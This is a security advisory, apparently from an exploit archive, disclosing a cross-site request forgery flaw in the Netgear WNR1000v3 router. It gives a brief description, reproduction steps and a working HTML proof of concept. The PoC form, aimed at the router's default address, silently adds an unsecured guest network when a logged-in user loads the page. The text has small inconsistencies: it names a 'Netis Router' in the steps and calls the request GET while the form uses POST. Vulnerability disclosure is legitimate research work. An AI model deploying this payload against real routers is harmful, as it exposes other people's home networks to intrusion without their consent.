Netgear WNR1000v3 suffers from a cross site request forgery vulnerability.
cf0c122fb5cd39be345afd9583d2f8fa # Exploit Title: NETGEAR WNR1000v3 Router Cross-Site Request Forgery
(CSRF)
# Date: 03/02/2018
# Exploit Author: Sajibe Kanti
# Author Contact: https://twitter.com/@sajibekantibd
# Vendor Homepage: http://netgear.com/
# Version: WNR1000v3 , Firmware Version V1.0.2.72_60.0.96
# Tested on Windows 10
#Technical Details & Description:
A cross-site request forgery web vulnerability has been discovered in the
official NETGEAR WNR1000v3 Router.
The vulnerability allows remote attackers to manipulate client-side
web-application to browser requests to compromise the router
by execution of system specific functions without session protection.
A remote attacker is able to Add Guest Network. settings of NETGEAR Router
with a cross-site request forgery html script code.
The vulnerability can be exploited by loading embedded html code in a site
or page. The issue can also be exploited by attackers to external redirect an
user account
to malicious web pages.
The issue requires medium user interaction in case of exploitation. The
request method to execute is GET and the attack vector is located on the
client-side of the router firmware.
Exploitation of the cross-site request forgery web vulnerability requires
no privilege web application user account and medium or high user
interaction.
Successful exploitation results in client-side account theft by client-side
phishing, client-side external redirects and non-persistent manipulation of
application functions that are in use.
The vulnerability can be exploited by remote attackers without privileged
application user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
#Manual steps to reproduce the vulnerability :
1. Logging Your Netis Router
1. Now inject or use the html code
2. When the user of the router opens the html code in site or other types
of redirection. Router Guest Network Will Be Added
4. Successful reproduce of the cross-site request forgery vulnerability!
#PoC: Exploitcode :
<html>
<!-- CSRF PoC - generated by Sajibe Kanti -->
<body>
<form action="
http://192.168.1.1/wlg_sec_profile_main.cgi?id=c259ef8b21d1840f20cc04a295bc447c22089926"
method="POST">
<input type="hidden" name="Apply" value="Apply" />
<input type="hidden" name="enable_bssid" value="1" />
<input type="hidden" name="enable_ssid_bc" value="1" />
<input type="hidden" name="ssid" value="NETGEAR-Guest" />
<input type="hidden" name="security_type" value="Disable" />
<input type="hidden" name="only_mode" value="0" />
<input type="hidden" name="bssid_enable" value="0" />
<input type="hidden" name="ssid_bc_enable" value="1" />
<input type="hidden" name="enable_allow_access" value="0" />
<input type="hidden" name="enable_isolation" value="" />
<input type="hidden" name="ssid_sel_submit" value="0" />
<input type="hidden" name="secure_sel_submit" value="0" />
<input type="hidden" name="show_wps_alert" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
--
Thanks
Sajibe Kanti
Independent Web Security Researcher <https://twitter.com/Sajibekantibd>